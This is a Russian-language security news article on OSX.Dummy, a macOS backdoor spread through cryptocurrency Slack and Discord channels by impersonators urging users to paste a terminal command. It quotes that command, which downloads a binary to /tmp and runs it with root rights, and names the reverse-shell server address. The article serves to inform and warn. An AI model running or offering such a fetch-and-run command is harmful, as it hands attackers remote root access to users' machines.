Хакер #305. Многошаговые SQL-инъекции
ИБ-специалисты обнаружили странного вредоноса для macOS, которому в итоге присвоили саркастическое название OSX.Dummy («дурак» в переводе с английского).
Первым угрозу заметил Ремко Верхуф (Remco Verhoef), основатель DutchSec и эксперт ISC SANS. Он сообщил, что мошенники действуют через каналы Slack и Discord, посвященные криптовалютам. Выдавая себя за администраторов, модераторов и известных в криптовалютном сообществе личностей, они распространяли в каналах сообщения с призывом для пользователей Mac. Уверяли, что нужно ввести команду в терминале, и якобы это поможет решить многие проблемы.
Команда, которую можно увидеть ниже, приводила к загрузке в директорию /tmp огромного бинарника (34 Мб) с названием script, а затем к его выполнению с root-правами.
cd /tmp && curl -s curl $ВРЕДОНОСНЫЙ_URL > script && chmod +x script && ./script
После этого script делал себя launch-демоном, чтобы закрепиться в системе, и создавал Python-скрипт, открывавший reverse shell к серверу 185.243.115.230:1337. Смысл этих действий был прост: предоставить атакующим доступ к скомпрометированной системе.
Специалист Malwarebytes Томас Рид (Thomas Reed), так же заметивший странную вредоносную кампанию, пишет, что конечные цели неизвестных злоумышленников пока ясны не до конца. Учитывая, что преступники выбрали своими жертвами пользователей, интересующихся криптовалютами и майнингом, вероятно, бэкдоры планировали использовать для хищения криптовалют.
Еще одним экспертом, изучившим новую вредоносную кампанию, стал известный специалист в области безопасности Mac Патрик Уордл (Patrick Wardle). Именно Уордл дал малвари имя OSX.Dummy. Эксперт сообщил, что давно не видел ничего глупее вредоноса, который просит у пользователя root-пароль, а также просит саму жертву выполнить на устройстве вредоносную команду.
Хуже того, эксперты предупреждают, что пароль не передается на удаленный сервер, но сохраняется в Users/Shared/dumpdummy и /tmp/dumpdummy, чтобы его можно было использовать для других вредоносный операций. Проблема в том, что root-пароль хранится незашифрованным, в открытом виде, и файл с паролем может сохраниться на устройстве даже после удаления самого OSX.Dummy. По мнению специалистов, впоследствии могут появиться другие вредоносы, которые станут прицельно искать пароли, ранее сохраненные OSX.Dummy.
«Я назвал его OSX.Dummy потому что:
метод заражения дурацкий;
огромный размер бинарника – это глупо;
механизм закрепления в системе жалок (следовательно, он дурацкий);
возможности [вредоноса] весьма ограничены (следовательно, он дурацкий);
его легко обнаружить на каждом этапе (это глупо);
...и наконец, малварь сохраняет пароли пользователей в dumpdummy», — пишет Уордл.